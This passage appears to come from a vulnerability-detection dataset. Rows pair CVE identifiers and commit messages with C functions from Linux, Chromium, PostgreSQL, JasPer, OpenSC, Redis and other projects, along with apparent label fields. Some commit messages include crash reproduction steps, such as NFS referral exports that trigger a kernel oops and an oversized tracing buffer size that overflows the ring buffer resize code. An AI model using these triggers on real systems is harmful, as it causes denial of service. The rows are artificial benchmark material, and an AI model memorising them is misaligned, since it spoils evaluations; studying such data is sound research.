TCPHeader *pTcpHeader = (TCPHeader *)RtlOffsetToPointer(pIpHeader, ipHeaderSize);
res.xxpStatus = ppresXxpKnown;
res.xxpFull = TRUE;
tcpipDataAt = ipHeaderSize + TCP_HEADER_LENGTH(pTcpHeader);
res.XxpIpHeaderSize = tcpipDataAt;
}
else
{
DPrintf(2, ("tcp: %d < min headers %d\n", len, tcpipDataAt));
res.xxpFull = FALSE;
res.xxpStatus = ppresXxpIncomplete;
}
return res;
}
|
C
|
kvm-guest-drivers-windows
| 0 |
CVE-2015-8746
|
https://www.cvedetails.com/cve/CVE-2015-8746/
| null |
https://github.com/torvalds/linux/commit/18e3b739fdc826481c6a1335ce0c5b19b3d415da
|
18e3b739fdc826481c6a1335ce0c5b19b3d415da
|
NFS: Fix a NULL pointer dereference of migration recovery ops for v4.2 client
---Steps to Reproduce--
<nfs-server>
# cat /etc/exports
/nfs/referal *(rw,insecure,no_subtree_check,no_root_squash,crossmnt)
/nfs/old *(ro,insecure,subtree_check,root_squash,crossmnt)
<nfs-client>
# mount -t nfs nfs-server:/nfs/ /mnt/
# ll /mnt/*/
<nfs-server>
# cat /etc/exports
/nfs/referal *(rw,insecure,no_subtree_check,no_root_squash,crossmnt,refer=/nfs/old/@nfs-server)
/nfs/old *(ro,insecure,subtree_check,root_squash,crossmnt)
# service nfs restart
<nfs-client>
# ll /mnt/*/ --->>>>> oops here
[ 5123.102925] BUG: unable to handle kernel NULL pointer dereference at (null)
[ 5123.103363] IP: [<ffffffffa03ed38b>] nfs4_proc_get_locations+0x9b/0x120 [nfsv4]
[ 5123.103752] PGD 587b9067 PUD 3cbf5067 PMD 0
[ 5123.104131] Oops: 0000 [#1]
[ 5123.104529] Modules linked in: nfsv4(OE) nfs(OE) fscache(E) nfsd(OE) xfs libcrc32c iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi coretemp crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel ppdev vmw_balloon parport_pc parport i2c_piix4 shpchp auth_rpcgss nfs_acl vmw_vmci lockd grace sunrpc vmwgfx drm_kms_helper ttm drm mptspi serio_raw scsi_transport_spi e1000 mptscsih mptbase ata_generic pata_acpi [last unloaded: nfsd]
[ 5123.105887] CPU: 0 PID: 15853 Comm: ::1-manager Tainted: G OE 4.2.0-rc6+ #214
[ 5123.106358] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/20/2014
[ 5123.106860] task: ffff88007620f300 ti: ffff88005877c000 task.ti: ffff88005877c000
[ 5123.107363] RIP: 0010:[<ffffffffa03ed38b>] [<ffffffffa03ed38b>] nfs4_proc_get_locations+0x9b/0x120 [nfsv4]
[ 5123.107909] RSP: 0018:ffff88005877fdb8 EFLAGS: 00010246
[ 5123.108435] RAX: ffff880053f3bc00 RBX: ffff88006ce6c908 RCX: ffff880053a0d240
[ 5123.108968] RDX: ffffea0000e6d940 RSI: ffff8800399a0000 RDI: ffff88006ce6c908
[ 5123.109503] RBP: ffff88005877fe28 R08: ffffffff81c708a0 R09: 0000000000000000
[ 5123.110045] R10: 00000000000001a2 R11: ffff88003ba7f5c8 R12: ffff880054c55800
[ 5123.110618] R13: 0000000000000000 R14: ffff880053a0d240 R15: ffff880053a0d240
[ 5123.111169] FS: 0000000000000000(0000) GS:ffffffff81c27000(0000) knlGS:0000000000000000
[ 5123.111726] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 5123.112286] CR2: 0000000000000000 CR3: 0000000054cac000 CR4: 00000000001406f0
[ 5123.112888] Stack:
[ 5123.113458] ffffea0000e6d940 ffff8800399a0000 00000000000167d0 0000000000000000
[ 5123.114049] 0000000000000000 0000000000000000 0000000000000000 00000000a7ec82c6
[ 5123.114662] ffff88005877fe18 ffffea0000e6d940 ffff8800399a0000 ffff880054c55800
[ 5123.115264] Call Trace:
[ 5123.115868] [<ffffffffa03fb44b>] nfs4_try_migration+0xbb/0x220 [nfsv4]
[ 5123.116487] [<ffffffffa03fcb3b>] nfs4_run_state_manager+0x4ab/0x7b0 [nfsv4]
[ 5123.117104] [<ffffffffa03fc690>] ? nfs4_do_reclaim+0x510/0x510 [nfsv4]
[ 5123.117813] [<ffffffff810a4527>] kthread+0xd7/0xf0
[ 5123.118456] [<ffffffff810a4450>] ? kthread_worker_fn+0x160/0x160
[ 5123.119108] [<ffffffff816d9cdf>] ret_from_fork+0x3f/0x70
[ 5123.119723] [<ffffffff810a4450>] ? kthread_worker_fn+0x160/0x160
[ 5123.120329] Code: 4c 8b 6a 58 74 17 eb 52 48 8d 55 a8 89 c6 4c 89 e7 e8 4a b5 ff ff 8b 45 b0 85 c0 74 1c 4c 89 f9 48 8b 55 90 48 8b 75 98 48 89 df <41> ff 55 00 3d e8 d8 ff ff 41 89 c6 74 cf 48 8b 4d c8 65 48 33
[ 5123.121643] RIP [<ffffffffa03ed38b>] nfs4_proc_get_locations+0x9b/0x120 [nfsv4]
[ 5123.122308] RSP <ffff88005877fdb8>
[ 5123.122942] CR2: 0000000000000000
Fixes: ec011fe847 ("NFS: Introduce a vector of migration recovery ops")
Cc: stable@vger.kernel.org # v3.13+
Signed-off-by: Kinglong Mee <kinglongmee@gmail.com>
Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
|
static int nfs4_proc_renew(struct nfs_client *clp, struct rpc_cred *cred)
{
struct rpc_message msg = {
.rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_RENEW],
.rpc_argp = clp,
.rpc_cred = cred,
};
unsigned long now = jiffies;
int status;
status = rpc_call_sync(clp->cl_rpcclient, &msg, RPC_TASK_TIMEOUT);
if (status < 0)
return status;
do_renew_lease(clp, now);
return 0;
}
|
static int nfs4_proc_renew(struct nfs_client *clp, struct rpc_cred *cred)
{
struct rpc_message msg = {
.rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_RENEW],
.rpc_argp = clp,
.rpc_cred = cred,
};
unsigned long now = jiffies;
int status;
status = rpc_call_sync(clp->cl_rpcclient, &msg, RPC_TASK_TIMEOUT);
if (status < 0)
return status;
do_renew_lease(clp, now);
return 0;
}
|
C
|
linux
| 0 |
CVE-2019-5790
|
https://www.cvedetails.com/cve/CVE-2019-5790/
|
CWE-190
|
https://github.com/chromium/chromium/commit/88fcb3a6899d77b64195423333ad81a00803f997
|
88fcb3a6899d77b64195423333ad81a00803f997
|
Move user activation check to RemoteFrame::Navigate's callers.
Currently RemoteFrame::Navigate is the user of
Frame::HasTransientUserActivation that passes a RemoteFrame*, and
it seems wrong because the user activation (user gesture) needed by
the navigation should belong to the LocalFrame that initiated the
navigation.
Follow-up CLs after this one will update UserActivation code in
Frame to take a LocalFrame* instead of a Frame*, and get rid of
redundant IPCs.
Bug: 811414
Change-Id: I771c1694043edb54374a44213d16715d9c7da704
Reviewed-on: https://chromium-review.googlesource.com/914736
Commit-Queue: Mustaq Ahmed <mustaq@chromium.org>
Reviewed-by: Daniel Cheng <dcheng@chromium.org>
Cr-Commit-Position: refs/heads/master@{#536728}
|
static ImageResourceContent* GetImageResource(Element* element) {
DCHECK(element);
LayoutObject* layout_object = element->GetLayoutObject();
if (!layout_object || !layout_object->IsImage())
return nullptr;
LayoutImage* image = ToLayoutImage(layout_object);
return image->CachedImage();
}
|
static ImageResourceContent* GetImageResource(Element* element) {
DCHECK(element);
LayoutObject* layout_object = element->GetLayoutObject();
if (!layout_object || !layout_object->IsImage())
return nullptr;
LayoutImage* image = ToLayoutImage(layout_object);
return image->CachedImage();
}
|
C
|
Chrome
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/5041f984669fe3a989a84c348eb838c8f7233f6b
|
5041f984669fe3a989a84c348eb838c8f7233f6b
|
AutoFill: Release the cached frame when we receive the frameDestroyed() message
from WebKit.
BUG=48857
TEST=none
Review URL: http://codereview.chromium.org/3173005
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@55789 0039d316-1c4b-4281-b951-d872f2087c98
|
void RenderView::willSendRequest(
WebFrame* frame, unsigned identifier, WebURLRequest& request,
const WebURLResponse& redirect_response) {
WebFrame* top_frame = frame->top();
if (!top_frame)
top_frame = frame;
WebDataSource* provisional_data_source = top_frame->provisionalDataSource();
WebDataSource* top_data_source = top_frame->dataSource();
WebDataSource* data_source =
provisional_data_source ? provisional_data_source : top_data_source;
if (data_source) {
NavigationState* state = NavigationState::FromDataSource(data_source);
if (state && state->is_cache_policy_override_set())
request.setCachePolicy(state->cache_policy_override());
}
if (top_data_source) {
NavigationState* state = NavigationState::FromDataSource(top_data_source);
if (state && request.targetType() == WebURLRequest::TargetIsPrefetch)
state->set_was_prefetcher(true);
}
request.setRequestorID(routing_id_);
if (CommandLine::ForCurrentProcess()->HasSwitch(switches::kNoReferrers))
request.clearHTTPHeaderField("Referer");
SiteIsolationMetrics::AddRequest(identifier, request.targetType());
}
|
void RenderView::willSendRequest(
WebFrame* frame, unsigned identifier, WebURLRequest& request,
const WebURLResponse& redirect_response) {
WebFrame* top_frame = frame->top();
if (!top_frame)
top_frame = frame;
WebDataSource* provisional_data_source = top_frame->provisionalDataSource();
WebDataSource* top_data_source = top_frame->dataSource();
WebDataSource* data_source =
provisional_data_source ? provisional_data_source : top_data_source;
if (data_source) {
NavigationState* state = NavigationState::FromDataSource(data_source);
if (state && state->is_cache_policy_override_set())
request.setCachePolicy(state->cache_policy_override());
}
if (top_data_source) {
NavigationState* state = NavigationState::FromDataSource(top_data_source);
if (state && request.targetType() == WebURLRequest::TargetIsPrefetch)
state->set_was_prefetcher(true);
}
request.setRequestorID(routing_id_);
if (CommandLine::ForCurrentProcess()->HasSwitch(switches::kNoReferrers))
request.clearHTTPHeaderField("Referer");
SiteIsolationMetrics::AddRequest(identifier, request.targetType());
}
|
C
|
Chrome
| 0 |
CVE-2014-9644
|
https://www.cvedetails.com/cve/CVE-2014-9644/
|
CWE-264
|
https://github.com/torvalds/linux/commit/4943ba16bbc2db05115707b3ff7b4874e9e3c560
|
4943ba16bbc2db05115707b3ff7b4874e9e3c560
|
crypto: include crypto- module prefix in template
This adds the module loading prefix "crypto-" to the template lookup
as well.
For example, attempting to load 'vfat(blowfish)' via AF_ALG now correctly
includes the "crypto-" prefix at every level, correctly rejecting "vfat":
net-pf-38
algif-hash
crypto-vfat(blowfish)
crypto-vfat(blowfish)-all
crypto-vfat
Reported-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Acked-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
|
static void crypto_cts_exit_tfm(struct crypto_tfm *tfm)
{
struct crypto_cts_ctx *ctx = crypto_tfm_ctx(tfm);
crypto_free_blkcipher(ctx->child);
}
|
static void crypto_cts_exit_tfm(struct crypto_tfm *tfm)
{
struct crypto_cts_ctx *ctx = crypto_tfm_ctx(tfm);
crypto_free_blkcipher(ctx->child);
}
|
C
|
linux
| 0 |
CVE-2014-1713
|
https://www.cvedetails.com/cve/CVE-2014-1713/
|
CWE-399
|
https://github.com/chromium/chromium/commit/f85a87ec670ad0fce9d98d90c9a705b72a288154
|
f85a87ec670ad0fce9d98d90c9a705b72a288154
|
document.location bindings fix
BUG=352374
R=jochen@chromium.org
Review URL: https://codereview.chromium.org/196343011
git-svn-id: svn://svn.chromium.org/blink/trunk@169176 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
static void nullableTestInterfaceAttributeAttributeSetterCallback(v8::Local<v8::String>, v8::Local<v8::Value> jsValue, const v8::PropertyCallbackInfo<void>& info)
{
TRACE_EVENT_SET_SAMPLING_STATE("Blink", "DOMSetter");
TestObjectPythonV8Internal::nullableTestInterfaceAttributeAttributeSetter(jsValue, info);
TRACE_EVENT_SET_SAMPLING_STATE("V8", "V8Execution");
}
|
static void nullableTestInterfaceAttributeAttributeSetterCallback(v8::Local<v8::String>, v8::Local<v8::Value> jsValue, const v8::PropertyCallbackInfo<void>& info)
{
TRACE_EVENT_SET_SAMPLING_STATE("Blink", "DOMSetter");
TestObjectPythonV8Internal::nullableTestInterfaceAttributeAttributeSetter(jsValue, info);
TRACE_EVENT_SET_SAMPLING_STATE("V8", "V8Execution");
}
|
C
|
Chrome
| 0 |
CVE-2014-3191
|
https://www.cvedetails.com/cve/CVE-2014-3191/
|
CWE-416
|
https://github.com/chromium/chromium/commit/11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
|
11a4cc4a6d6e665d9a118fada4b7c658d6f70d95
|
Defer call to updateWidgetPositions() outside of RenderLayerScrollableArea.
updateWidgetPositions() can destroy the render tree, so it should never
be called from inside RenderLayerScrollableArea. Leaving it there allows
for the potential of use-after-free bugs.
BUG=402407
R=vollick@chromium.org
Review URL: https://codereview.chromium.org/490473003
git-svn-id: svn://svn.chromium.org/blink/trunk@180681 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
void FrameView::reset()
{
m_hasPendingLayout = false;
m_layoutSubtreeRoot = 0;
m_doFullPaintInvalidation = false;
m_layoutSchedulingEnabled = true;
m_inPerformLayout = false;
m_canInvalidatePaintDuringPerformLayout = false;
m_inSynchronousPostLayout = false;
m_layoutCount = 0;
m_nestedLayoutCount = 0;
m_postLayoutTasksTimer.stop();
m_updateWidgetsTimer.stop();
m_firstLayout = true;
m_firstLayoutCallbackPending = false;
m_wasScrolledByUser = false;
m_safeToPropagateScrollToParent = true;
m_lastViewportSize = IntSize();
m_lastZoomFactor = 1.0f;
m_isTrackingPaintInvalidations = false;
m_trackedPaintInvalidationRects.clear();
m_lastPaintTime = 0;
m_paintBehavior = PaintBehaviorNormal;
m_isPainting = false;
m_visuallyNonEmptyCharacterCount = 0;
m_visuallyNonEmptyPixelCount = 0;
m_isVisuallyNonEmpty = false;
m_firstVisuallyNonEmptyLayoutCallbackPending = true;
m_maintainScrollPositionAnchor = nullptr;
m_viewportConstrainedObjects.clear();
}
|
void FrameView::reset()
{
m_hasPendingLayout = false;
m_layoutSubtreeRoot = 0;
m_doFullPaintInvalidation = false;
m_layoutSchedulingEnabled = true;
m_inPerformLayout = false;
m_canInvalidatePaintDuringPerformLayout = false;
m_inSynchronousPostLayout = false;
m_layoutCount = 0;
m_nestedLayoutCount = 0;
m_postLayoutTasksTimer.stop();
m_updateWidgetsTimer.stop();
m_firstLayout = true;
m_firstLayoutCallbackPending = false;
m_wasScrolledByUser = false;
m_safeToPropagateScrollToParent = true;
m_lastViewportSize = IntSize();
m_lastZoomFactor = 1.0f;
m_isTrackingPaintInvalidations = false;
m_trackedPaintInvalidationRects.clear();
m_lastPaintTime = 0;
m_paintBehavior = PaintBehaviorNormal;
m_isPainting = false;
m_visuallyNonEmptyCharacterCount = 0;
m_visuallyNonEmptyPixelCount = 0;
m_isVisuallyNonEmpty = false;
m_firstVisuallyNonEmptyLayoutCallbackPending = true;
m_maintainScrollPositionAnchor = nullptr;
m_viewportConstrainedObjects.clear();
}
|
C
|
Chrome
| 0 |
CVE-2015-5289
|
https://www.cvedetails.com/cve/CVE-2015-5289/
|
CWE-119
|
https://git.postgresql.org/gitweb/?p=postgresql.git;a=commit;h=08fa47c4850cea32c3116665975bca219fbf2fe6
|
08fa47c4850cea32c3116665975bca219fbf2fe6
| null |
json_populate_recordset(PG_FUNCTION_ARGS)
{
return populate_recordset_worker(fcinfo, "json_populate_recordset", true);
}
|
json_populate_recordset(PG_FUNCTION_ARGS)
{
return populate_recordset_worker(fcinfo, "json_populate_recordset", true);
}
|
C
|
postgresql
| 0 |
CVE-2016-9557
|
https://www.cvedetails.com/cve/CVE-2016-9557/
|
CWE-190
|
https://github.com/mdadams/jasper/commit/d42b2388f7f8e0332c846675133acea151fc557a
|
d42b2388f7f8e0332c846675133acea151fc557a
|
The generation of the configuration file jas_config.h has been completely
reworked in order to avoid pollution of the global namespace.
Some problematic types like uchar, ulong, and friends have been replaced
with names with a jas_ prefix.
An option max_samples has been added to the BMP and JPEG decoders to
restrict the maximum size of image that they can decode. This change
was made as a (possibly temporary) fix to address security concerns.
A max_samples command-line option has also been added to imginfo.
Whether an image component (for jas_image_t) is stored in memory or on
disk is now based on the component size (rather than the image size).
Some debug log messages were added.
Some new integer overflow checks were added.
Some new safe integer add/multiply functions were added.
More pre-C99 cruft was removed. JasPer has numerous "hacks" to
handle pre-C99 compilers. JasPer now assumes C99 support. So, this
pre-C99 cruft is unnecessary and can be removed.
The regression jasper-doublefree-mem_close.jpg has been re-enabled.
Theoretically, it should work more predictably now.
|
static int jpc_unk_dumpparms(jpc_ms_t *ms, FILE *out)
{
unsigned int i;
jpc_unk_t *unk = &ms->parms.unk;
for (i = 0; i < unk->len; ++i) {
fprintf(out, "%02x ", unk->data[i]);
}
return 0;
}
|
static int jpc_unk_dumpparms(jpc_ms_t *ms, FILE *out)
{
unsigned int i;
jpc_unk_t *unk = &ms->parms.unk;
for (i = 0; i < unk->len; ++i) {
fprintf(out, "%02x ", unk->data[i]);
}
return 0;
}
|
C
|
jasper
| 0 |
CVE-2014-9659
|
https://www.cvedetails.com/cve/CVE-2014-9659/
|
CWE-119
|
https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=2cdc4562f873237f1c77d43540537c7a721d3fd8
|
2cdc4562f873237f1c77d43540537c7a721d3fd8
| null |
cf2_glyphpath_closeOpenPath( CF2_GlyphPath glyphpath )
{
if ( glyphpath->pathIsOpen )
{
/*
* A closing line in Character Space line is always generated below
* with `cf2_glyphPath_lineTo'. It may be ignored later if it turns
* out to be zero length in Device Space.
*/
glyphpath->pathIsClosing = TRUE;
cf2_glyphpath_lineTo( glyphpath,
glyphpath->start.x,
glyphpath->start.y );
/* empty the final element from the queue and close the path */
if ( glyphpath->elemIsQueued )
cf2_glyphpath_pushPrevElem( glyphpath,
&glyphpath->hintMap,
&glyphpath->offsetStart0,
glyphpath->offsetStart1,
TRUE );
/* reset state machine */
glyphpath->moveIsPending = TRUE;
glyphpath->pathIsOpen = FALSE;
glyphpath->pathIsClosing = FALSE;
glyphpath->elemIsQueued = FALSE;
}
}
|
cf2_glyphpath_closeOpenPath( CF2_GlyphPath glyphpath )
{
if ( glyphpath->pathIsOpen )
{
/*
* A closing line in Character Space line is always generated below
* with `cf2_glyphPath_lineTo'. It may be ignored later if it turns
* out to be zero length in Device Space.
*/
glyphpath->pathIsClosing = TRUE;
cf2_glyphpath_lineTo( glyphpath,
glyphpath->start.x,
glyphpath->start.y );
/* empty the final element from the queue and close the path */
if ( glyphpath->elemIsQueued )
cf2_glyphpath_pushPrevElem( glyphpath,
&glyphpath->hintMap,
&glyphpath->offsetStart0,
glyphpath->offsetStart1,
TRUE );
/* reset state machine */
glyphpath->moveIsPending = TRUE;
glyphpath->pathIsOpen = FALSE;
glyphpath->pathIsClosing = FALSE;
glyphpath->elemIsQueued = FALSE;
}
}
|
C
|
savannah
| 0 |
CVE-2016-1683
|
https://www.cvedetails.com/cve/CVE-2016-1683/
|
CWE-119
|
https://github.com/chromium/chromium/commit/96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab
|
96dbafe288dbe2f0cc45fa3c39daf6d0c37acbab
|
Roll libxslt to 891681e3e948f31732229f53cb6db7215f740fc7
BUG=583156,583171
Review URL: https://codereview.chromium.org/1853083002
Cr-Commit-Position: refs/heads/master@{#385338}
|
xsltCheckExtPrefix(xsltStylesheetPtr style, const xmlChar * URI)
{
#ifdef XSLT_REFACTORED
if ((style == NULL) || (style->compCtxt == NULL) ||
(XSLT_CCTXT(style)->inode == NULL) ||
(XSLT_CCTXT(style)->inode->extElemNs == NULL))
return (0);
/*
* Lookup the extension namespaces registered
* at the current node in the stylesheet's tree.
*/
if (XSLT_CCTXT(style)->inode->extElemNs != NULL) {
int i;
xsltPointerListPtr list = XSLT_CCTXT(style)->inode->extElemNs;
for (i = 0; i < list->number; i++) {
if (xmlStrEqual((const xmlChar *) list->items[i],
URI))
{
return(1);
}
}
}
#else
xsltExtDefPtr cur;
if ((style == NULL) || (style->nsDefs == NULL))
return (0);
if (URI == NULL)
URI = BAD_CAST "#default";
cur = (xsltExtDefPtr) style->nsDefs;
while (cur != NULL) {
/*
* NOTE: This was change to work on namespace names rather
* than namespace prefixes. This fixes bug #339583.
* TODO: Consider renaming the field "prefix" of xsltExtDef
* to "href".
*/
if (xmlStrEqual(URI, cur->prefix))
return (1);
cur = cur->next;
}
#endif
return (0);
}
|
xsltCheckExtPrefix(xsltStylesheetPtr style, const xmlChar * URI)
{
#ifdef XSLT_REFACTORED
if ((style == NULL) || (style->compCtxt == NULL) ||
(XSLT_CCTXT(style)->inode == NULL) ||
(XSLT_CCTXT(style)->inode->extElemNs == NULL))
return (0);
/*
* Lookup the extension namespaces registered
* at the current node in the stylesheet's tree.
*/
if (XSLT_CCTXT(style)->inode->extElemNs != NULL) {
int i;
xsltPointerListPtr list = XSLT_CCTXT(style)->inode->extElemNs;
for (i = 0; i < list->number; i++) {
if (xmlStrEqual((const xmlChar *) list->items[i],
URI))
{
return(1);
}
}
}
#else
xsltExtDefPtr cur;
if ((style == NULL) || (style->nsDefs == NULL))
return (0);
if (URI == NULL)
URI = BAD_CAST "#default";
cur = (xsltExtDefPtr) style->nsDefs;
while (cur != NULL) {
/*
* NOTE: This was change to work on namespace names rather
* than namespace prefixes. This fixes bug #339583.
* TODO: Consider renaming the field "prefix" of xsltExtDef
* to "href".
*/
if (xmlStrEqual(URI, cur->prefix))
return (1);
cur = cur->next;
}
#endif
return (0);
}
|
C
|
Chrome
| 0 |
CVE-2018-16427
|
https://www.cvedetails.com/cve/CVE-2018-16427/
|
CWE-125
|
https://github.com/OpenSC/OpenSC/pull/1447/commits/8fe377e93b4b56060e5bbfb6f3142ceaeca744fa
|
8fe377e93b4b56060e5bbfb6f3142ceaeca744fa
|
fixed out of bounds reads
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting and suggesting security fixes.
|
gpk_hash(sc_card_t *card, const u8 *data, size_t datalen)
{
sc_apdu_t apdu;
unsigned int count, chain, len;
int r;
chain = 0x01;
for (count = 0; count < datalen; count += len) {
unsigned char buffer[GPK_HASH_CHUNK+2];
if ((len = datalen - count) > GPK_HASH_CHUNK)
len = GPK_HASH_CHUNK;
else
chain |= 0x10;
buffer[0] = 0x55;
buffer[1] = len;
memcpy(buffer+2, data + count, len);
memset(&apdu, 0, sizeof(apdu));
apdu.cse = SC_APDU_CASE_3_SHORT;
apdu.cla = 0x80;
apdu.ins = 0xDA;
apdu.p1 = chain;
apdu.p2 = len;
apdu.lc = len + 2;
apdu.data= buffer;
apdu.datalen = len + 2;
r = sc_transmit_apdu(card, &apdu);
SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed");
r = sc_check_sw(card, apdu.sw1, apdu.sw2);
SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "Card returned error");
chain = 0;
}
return 0;
}
|
gpk_hash(sc_card_t *card, const u8 *data, size_t datalen)
{
sc_apdu_t apdu;
unsigned int count, chain, len;
int r;
chain = 0x01;
for (count = 0; count < datalen; count += len) {
unsigned char buffer[GPK_HASH_CHUNK+2];
if ((len = datalen - count) > GPK_HASH_CHUNK)
len = GPK_HASH_CHUNK;
else
chain |= 0x10;
buffer[0] = 0x55;
buffer[1] = len;
memcpy(buffer+2, data + count, len);
memset(&apdu, 0, sizeof(apdu));
apdu.cse = SC_APDU_CASE_3_SHORT;
apdu.cla = 0x80;
apdu.ins = 0xDA;
apdu.p1 = chain;
apdu.p2 = len;
apdu.lc = len + 2;
apdu.data= buffer;
apdu.datalen = len + 2;
r = sc_transmit_apdu(card, &apdu);
SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed");
r = sc_check_sw(card, apdu.sw1, apdu.sw2);
SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "Card returned error");
chain = 0;
}
return 0;
}
|
C
|
OpenSC
| 0 |
CVE-2018-11218
|
https://www.cvedetails.com/cve/CVE-2018-11218/
|
CWE-119
|
https://github.com/antirez/redis/commit/5ccb6f7a791bf3490357b00a898885759d98bab0
|
5ccb6f7a791bf3490357b00a898885759d98bab0
|
Security: more cmsgpack fixes by @soloestoy.
@soloestoy sent me these additional fixes, after searching for similar
problems to the one reported in mp_pack(). I'm committing the changes
because it was not possible during to make a public PR to protect Redis
users and give Redis providers some time to patch their systems.
|
void mp_encode_lua_bool(lua_State *L, mp_buf *buf) {
unsigned char b = lua_toboolean(L,-1) ? 0xc3 : 0xc2;
mp_buf_append(L,buf,&b,1);
}
|
void mp_encode_lua_bool(lua_State *L, mp_buf *buf) {
unsigned char b = lua_toboolean(L,-1) ? 0xc3 : 0xc2;
mp_buf_append(L,buf,&b,1);
}
|
C
|
redis
| 0 |
CVE-2016-9754
|
https://www.cvedetails.com/cve/CVE-2016-9754/
|
CWE-190
|
https://github.com/torvalds/linux/commit/59643d1535eb220668692a5359de22545af579f6
|
59643d1535eb220668692a5359de22545af579f6
|
ring-buffer: Prevent overflow of size in ring_buffer_resize()
If the size passed to ring_buffer_resize() is greater than MAX_LONG - BUF_PAGE_SIZE
then the DIV_ROUND_UP() will return zero.
Here's the details:
# echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb
tracing_entries_write() processes this and converts kb to bytes.
18014398509481980 << 10 = 18446744073709547520
and this is passed to ring_buffer_resize() as unsigned long size.
size = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
Where DIV_ROUND_UP(a, b) is (a + b - 1)/b
BUF_PAGE_SIZE is 4080 and here
18446744073709547520 + 4080 - 1 = 18446744073709551599
where 18446744073709551599 is still smaller than 2^64
2^64 - 18446744073709551599 = 17
But now 18446744073709551599 / 4080 = 4521260802379792
and size = size * 4080 = 18446744073709551360
This is checked to make sure its still greater than 2 * 4080,
which it is.
Then we convert to the number of buffer pages needed.
nr_page = DIV_ROUND_UP(size, BUF_PAGE_SIZE)
but this time size is 18446744073709551360 and
2^64 - (18446744073709551360 + 4080 - 1) = -3823
Thus it overflows and the resulting number is less than 4080, which makes
3823 / 4080 = 0
an nr_pages is set to this. As we already checked against the minimum that
nr_pages may be, this causes the logic to fail as well, and we crash the
kernel.
There's no reason to have the two DIV_ROUND_UP() (that's just result of
historical code changes), clean up the code and fix this bug.
Cc: stable@vger.kernel.org # 3.5+
Fixes: 83f40318dab00 ("ring-buffer: Make removal of ring buffer pages atomic")
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
|
int ring_buffer_write(struct ring_buffer *buffer,
unsigned long length,
void *data)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
void *body;
int ret = -EBUSY;
int cpu;
preempt_disable_notrace();
if (atomic_read(&buffer->record_disabled))
goto out;
cpu = raw_smp_processor_id();
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu];
if (atomic_read(&cpu_buffer->record_disabled))
goto out;
if (length > BUF_MAX_DATA_SIZE)
goto out;
if (unlikely(trace_recursive_lock(cpu_buffer)))
goto out;
event = rb_reserve_next_event(buffer, cpu_buffer, length);
if (!event)
goto out_unlock;
body = rb_event_data(event);
memcpy(body, data, length);
rb_commit(cpu_buffer, event);
rb_wakeups(buffer, cpu_buffer);
ret = 0;
out_unlock:
trace_recursive_unlock(cpu_buffer);
out:
preempt_enable_notrace();
return ret;
}
|
int ring_buffer_write(struct ring_buffer *buffer,
unsigned long length,
void *data)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
void *body;
int ret = -EBUSY;
int cpu;
preempt_disable_notrace();
if (atomic_read(&buffer->record_disabled))
goto out;
cpu = raw_smp_processor_id();
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu];
if (atomic_read(&cpu_buffer->record_disabled))
goto out;
if (length > BUF_MAX_DATA_SIZE)
goto out;
if (unlikely(trace_recursive_lock(cpu_buffer)))
goto out;
event = rb_reserve_next_event(buffer, cpu_buffer, length);
if (!event)
goto out_unlock;
body = rb_event_data(event);
memcpy(body, data, length);
rb_commit(cpu_buffer, event);
rb_wakeups(buffer, cpu_buffer);
ret = 0;
out_unlock:
trace_recursive_unlock(cpu_buffer);
out:
preempt_enable_notrace();
return ret;
}
|
C
|
linux
| 0 |
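The ring_buffer_resize() commit message above walks through the arithmetic by hand; the small program below simply replays those numbers with 64-bit unsigned arithmetic so the wrap to zero in the second DIV_ROUND_UP() can be observed directly. It is a demonstration of the quoted calculation, not kernel code.

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

#define BUF_PAGE_SIZE 4080ULL
#define DIV_ROUND_UP(a, b) (((a) + (b) - 1) / (b))

int main(void)
{
    /* echo 18014398509481980 > buffer_size_kb, converted to bytes */
    uint64_t size = 18014398509481980ULL << 10;
    printf("size in bytes  : %" PRIu64 "\n", size);

    /* First round-up still fits: 18446744073709551599 / 4080 pages */
    uint64_t nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
    printf("first round-up : %" PRIu64 " pages\n", nr_pages);

    size = nr_pages * BUF_PAGE_SIZE;
    printf("size rounded   : %" PRIu64 "\n", size);

    /* size + 4079 now wraps past 2^64, so the result collapses to 0 */
    nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
    printf("second round-up: %" PRIu64 " pages\n", nr_pages);
    return 0;
}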
CVE-2011-4930
|
https://www.cvedetails.com/cve/CVE-2011-4930/
|
CWE-134
|
https://htcondor-git.cs.wisc.edu/?p=condor.git;a=commitdiff;h=5e5571d1a431eb3c61977b6dd6ec90186ef79867
|
5e5571d1a431eb3c61977b6dd6ec90186ef79867
| null |
const char * SafeSock :: isIncomingDataMD5ed()
{
char c;
if (!peek(c)) {
